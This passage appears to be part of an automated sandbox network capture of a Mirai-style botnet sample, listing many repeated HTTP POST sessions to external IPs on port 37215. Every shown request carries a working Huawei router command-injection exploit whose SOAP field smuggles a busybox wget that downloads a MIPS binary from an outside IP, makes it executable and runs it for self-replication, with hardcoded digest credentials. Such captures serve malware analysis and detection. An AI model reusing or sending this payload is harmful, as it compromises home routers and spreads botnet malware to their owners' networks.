                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          216192.168.2.235707041.132.188.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152823925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          217192.168.2.234196841.38.103.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152825117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          218192.168.2.234864241.236.127.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152848005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          219192.168.2.233476862.156.201.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152852058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          220192.168.2.233756241.4.20.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152884960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          221192.168.2.2348922197.46.196.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153352976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          222192.168.2.2339156194.42.64.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153357029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          223192.168.2.2357416170.217.222.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153357983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          224192.168.2.2333846157.70.135.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153381109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          225192.168.2.2336440157.161.17.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.153412104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
